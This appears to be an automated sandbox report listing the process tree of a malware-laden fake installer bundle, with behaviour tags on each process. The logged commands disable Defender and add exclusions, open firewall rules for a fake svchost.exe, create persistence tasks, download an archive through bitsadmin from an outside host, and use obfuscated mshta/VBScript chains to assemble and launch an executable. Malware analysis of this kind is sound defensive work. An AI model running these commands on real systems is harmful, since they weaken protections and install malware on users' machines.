C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf3⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
-
-
-
C:\Users\Admin\AppData\Roaming\adeavdfC:\Users\Admin\AppData\Roaming\adeavdf2⤵
-
-
C:\Users\Admin\AppData\Roaming\treavdfC:\Users\Admin\AppData\Roaming\treavdf2⤵
-
-
C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe"2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09D9EDF5\Sun07f05cf99e017109.exeSun07f05cf99e017109.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe"C:\Users\Admin\Pictures\Adobe Films\7F9Pq9Hae1NhAZoTrmUMaZp4.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\msPQyRa7SJFy2d_R4XsrIJvu.exe"C:\Users\Admin\Pictures\Adobe Films\msPQyRa7SJFy2d_R4XsrIJvu.exe"6⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Checks whether UAC is enabled
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fqdZBPmQRuvcZqwSZ4XiEizX.exe"C:\Users\Admin\Pictures\Adobe Films\fqdZBPmQRuvcZqwSZ4XiEizX.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Ipmt5nsArFThA6xuoEUQLchI.exe"C:\Users\Admin\Pictures\Adobe Films\Ipmt5nsArFThA6xuoEUQLchI.exe"6⤵
-
C:\Users\Admin\Documents\tP7_XXiJvOBrfd9uENaRCzSJ.exe"C:\Users\Admin\Documents\tP7_XXiJvOBrfd9uENaRCzSJ.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\r3hogt_iviJaOOzizo_WYcB5.exe"C:\Users\Admin\Pictures\Adobe Films\r3hogt_iviJaOOzizo_WYcB5.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\2TdQEltTrGrXxqYYxPpuytFo.exe"C:\Users\Admin\Pictures\Adobe Films\2TdQEltTrGrXxqYYxPpuytFo.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\HOCzniz8LOlByitpo8Mk5dDp.exe"C:\Users\Admin\Pictures\Adobe Films\HOCzniz8LOlByitpo8Mk5dDp.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\drSrzhTfs5eb0CE8eL2Subof.exe"C:\Users\Admin\Pictures\Adobe Films\drSrzhTfs5eb0CE8eL2Subof.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\a9mK9J7f1wFcHMTrCN8ZvuD1.exe"C:\Users\Admin\Pictures\Adobe Films\a9mK9J7f1wFcHMTrCN8ZvuD1.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\a9mK9J7f1wFcHMTrCN8ZvuD1.exe"C:\Users\Admin\Pictures\Adobe Films\a9mK9J7f1wFcHMTrCN8ZvuD1.exe" -u9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3x8xPwm8RTKQBBQXsCP81XFA.exe"C:\Users\Admin\Pictures\Adobe Films\3x8xPwm8RTKQBBQXsCP81XFA.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-ON70P.tmp\3x8xPwm8RTKQBBQXsCP81XFA.tmp"C:\Users\Admin\AppData\Local\Temp\is-ON70P.tmp\3x8xPwm8RTKQBBQXsCP81XFA.tmp" /SL5="$1080E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\3x8xPwm8RTKQBBQXsCP81XFA.exe"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-K2GVQ.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-K2GVQ.tmp\lakazet.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\a2-2f9d0-763-1e88f-43e2dd1df4dee\Xushafufubo.exe"C:\Users\Admin\AppData\Local\Temp\a2-2f9d0-763-1e88f-43e2dd1df4dee\Xushafufubo.exe"11⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ow2kolh4.enf\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ow2kolh4.enf\installer.exeC:\Users\Admin\AppData\Local\Temp\ow2kolh4.enf\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k3njtckx.sjn\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\k3njtckx.sjn\any.exeC:\Users\Admin\AppData\Local\Temp\k3njtckx.sjn\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\k3njtckx.sjn\any.exe"C:\Users\Admin\AppData\Local\Temp\k3njtckx.sjn\any.exe" -u14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tr12n1xk.kws\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\tr12n1xk.kws\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\tr12n1xk.kws\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nshD859.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7k7yTDP2LkERyInyqjzKrJjY.exe"C:\Users\Admin\Pictures\Adobe Films\7k7yTDP2LkERyInyqjzKrJjY.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--AelopX6Kw"10⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1a4,0x1a0,0x60,0x1d8,0x54,0x7ffd78aedec0,0x7ffd78aeded0,0x7ffd78aedee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff74f3c9e70,0x7ff74f3c9e80,0x7ff74f3c9e9012⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,9874638815619014249,16582467347742968990,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9780_1136505465" --mojo-platform-channel-handle=1776 /prefetch:811⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i4icmuXWZHfmocNZIbtcYqwt.exe"C:\Users\Admin\Pictures\Adobe Films\i4icmuXWZHfmocNZIbtcYqwt.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Checks SCSI registry key(s)
- Kills process with taskkill
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\B20czoowzDkggMeiRNOKq0pr.exe"C:\Users\Admin\Pictures\Adobe Films\B20czoowzDkggMeiRNOKq0pr.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\8E2z3CGpk_A4T4SkNSYWvu2U.exe"C:\Users\Admin\Pictures\Adobe Films\8E2z3CGpk_A4T4SkNSYWvu2U.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\4u0oC0fTPunlkp32wkGQAj2s.exe"C:\Users\Admin\Pictures\Adobe Films\4u0oC0fTPunlkp32wkGQAj2s.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\WtNgh45WURCwhi4qrCJ4dR90.exe"C:\Users\Admin\Pictures\Adobe Films\WtNgh45WURCwhi4qrCJ4dR90.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IUBEsQnOuzIQQQl4c58IqG3O.exe"C:\Users\Admin\Pictures\Adobe Films\IUBEsQnOuzIQQQl4c58IqG3O.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\kDM4XdbnIhhz0Zo2QxlYIFDE.exe"C:\Users\Admin\Pictures\Adobe Films\kDM4XdbnIhhz0Zo2QxlYIFDE.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\kDM4XdbnIhhz0Zo2QxlYIFDE.exe"C:\Users\Admin\Pictures\Adobe Films\kDM4XdbnIhhz0Zo2QxlYIFDE.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sQILyGN7vQF0PMiLymd2dcx4.exe"C:\Users\Admin\Pictures\Adobe Films\sQILyGN7vQF0PMiLymd2dcx4.exe"6⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\j5TPzXj_lm10V2vnEmeU6BFJ.exe"C:\Users\Admin\Pictures\Adobe Films\j5TPzXj_lm10V2vnEmeU6BFJ.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\j5TPzXj_lm10V2vnEmeU6BFJ.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\q4jl1S7SSIEtjm87hqBXLHDC.exe"C:\Users\Admin\Pictures\Adobe Films\q4jl1S7SSIEtjm87hqBXLHDC.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\D5SNAm6TXGzPYuS9YAkwJ_bC.exe"C:\Users\Admin\Pictures\Adobe Films\D5SNAm6TXGzPYuS9YAkwJ_bC.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\agBx5QPSfuavDHEQ2rBtKziv.exe"C:\Users\Admin\Pictures\Adobe Films\agBx5QPSfuavDHEQ2rBtKziv.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im agBx5QPSfuavDHEQ2rBtKziv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\agBx5QPSfuavDHEQ2rBtKziv.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agBx5QPSfuavDHEQ2rBtKziv.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\693yFU9bqjnrH213ujNcBTSE.exe"C:\Users\Admin\Pictures\Adobe Films\693yFU9bqjnrH213ujNcBTSE.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\UueK69wMlLZNw0IhXUYabCxA.exe"C:\Users\Admin\Pictures\Adobe Films\UueK69wMlLZNw0IhXUYabCxA.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\UueK69wMlLZNw0IhXUYabCxA.exe"C:\Users\Admin\Pictures\Adobe Films\UueK69wMlLZNw0IhXUYabCxA.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\p6SpwgHWZYDtbaBGVQ69N03f.exe"C:\Users\Admin\Pictures\Adobe Films\p6SpwgHWZYDtbaBGVQ69N03f.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5147052.exe"C:\Users\Admin\AppData\Roaming\5147052.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\39292.exe"C:\Users\Admin\AppData\Roaming\39292.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\8814254.exe"C:\Users\Admin\AppData\Roaming\8814254.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\1363223.exe"C:\Users\Admin\AppData\Roaming\1363223.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3088953.exe"C:\Users\Admin\AppData\Roaming\3088953.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\7099288.exe"C:\Users\Admin\AppData\Roaming\7099288.exe"7⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\7099288.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\7099288.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )8⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\7099288.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\7099288.exe" ) do taskkill -F -IM "%~Nxv"9⤵
-
C:\Users\Admin\AppData\Local\Temp\Qw5u.exeQw5U.Exe -PmowtdFUhhnCoUk10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk "" == """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "-PmowtdFUhhnCoUk " == "" for %v In ("C:\Users\Admin\AppData\Local\Temp\Qw5u.exe" ) do taskkill -F -IM "%~Nxv"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIPt: CloSE( cREateOBJecT ( "WscRipt.SHeLl" ). Run ("CMD /Q /C ECHO | sEt /P = ""MZ"" > IEEeXE.7YX & CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ + zYEV.3Cu + NUvL.Bf2 B0M3yFV5.lRJ & del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ " , 0 , tRUE) )11⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ECHO | sEt /P = "MZ" > IEEeXE.7YX& CoPY /b /Y IEEeXE.7YX + WWgJAR1.EZ + zYEV.3Cu + NUvL.Bf2 B0M3yFV5.lRJ & del wWgJAR1.EZ zYEv.3cU NUVL.Bf2 IEEEXE.7yX& START control.exe .\B0M3YFV5.lRJ12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>IEEeXE.7YX"13⤵
-
-
C:\Windows\SysWOW64\control.execontrol.exe .\B0M3YFV5.lRJ13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ14⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\B0M3YFV5.lRJ15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\B0M3YFV5.lRJ16⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "7099288.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\3059972.exe"C:\Users\Admin\AppData\Roaming\3059972.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PqNTal8ZcSZBRz5Y0T098SgP.exe"C:\Users\Admin\Pictures\Adobe Films\PqNTal8ZcSZBRz5Y0T098SgP.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\PqNTal8ZcSZBRz5Y0T098SgP.exe"C:\Users\Admin\Pictures\Adobe Films\PqNTal8ZcSZBRz5Y0T098SgP.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\64Ahia_ZWggujkxpyOFejhY6.exe"C:\Users\Admin\Pictures\Adobe Films\64Ahia_ZWggujkxpyOFejhY6.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AKE1E.tmp\64Ahia_ZWggujkxpyOFejhY6.tmp"C:\Users\Admin\AppData\Local\Temp\is-AKE1E.tmp\64Ahia_ZWggujkxpyOFejhY6.tmp" /SL5="$40148,506127,422400,C:\Users\Admin\Pictures\Adobe Films\64Ahia_ZWggujkxpyOFejhY6.exe"7⤵
- Loads dropped DLL
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-BOBQ9.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-BOBQ9.tmp\lakazet.exe" /S /UID=27098⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\7a-0d2e0-b60-8db8c-8b180a2cd0029\Maekejoxama.exe"C:\Users\Admin\AppData\Local\Temp\7a-0d2e0-b60-8db8c-8b180a2cd0029\Maekejoxama.exe"9⤵
- Checks computer location settings
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 217610⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4a-794f5-6b9-c0684-bb27acbae5012\Pabugaezhujae.exe"C:\Users\Admin\AppData\Local\Temp\4a-794f5-6b9-c0684-bb27acbae5012\Pabugaezhujae.exe"9⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uthfdrte.r2x\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\uthfdrte.r2x\installer.exeC:\Users\Admin\AppData\Local\Temp\uthfdrte.r2x\installer.exe /qn CAMPAIGN="654"11⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg4dgcr5.3mh\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\dg4dgcr5.3mh\any.exeC:\Users\Admin\AppData\Local\Temp\dg4dgcr5.3mh\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\dg4dgcr5.3mh\any.exe"C:\Users\Admin\AppData\Local\Temp\dg4dgcr5.3mh\any.exe" -u12⤵
-
